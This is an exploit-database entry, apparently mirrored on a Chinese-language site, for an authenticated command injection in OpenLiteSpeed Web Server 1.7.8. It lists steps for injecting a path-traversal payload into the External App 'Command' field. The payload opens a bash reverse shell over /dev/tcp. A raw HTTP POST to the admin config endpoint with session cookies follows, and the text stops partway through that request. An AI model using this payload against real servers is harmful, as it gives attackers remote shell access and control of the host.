Openlitespeed Web Server 1.7.8 – Command Injection (Authenticated) (1)

  • 作者: SunCSR
    日期: 2021-01-27
  • 类别:
  • 来源:
  • # Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated)
    # Date: 26/1/2021
    # Exploit Author: cmOs - SunCSR
    # Vendor Homepage:
    # Software Link:
    # Version: 1.7.8
    # Tested on Windows 10
    Step 1: Log in to the dashboard using the Administrator account.
    Step 2 : Access Server Configuration > External App > Command
    Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon)
    Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'" to "Command" value
    Step 5: Graceful Restart
    POST /view/confMgr.php HTTP/1.1
    Host: target:7080
    Connection: close
    Content-Length: 579
    Accept: text/html, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: https://target:7080
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://target:7080/index.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: LSUI37FE0C43B84483E0=b8e3df9c8a36fc631dd688accca82aee;
    litespeed_admin_lang=english; LSID37FE0C43B84483E0=W7zzfuEznhk%3D;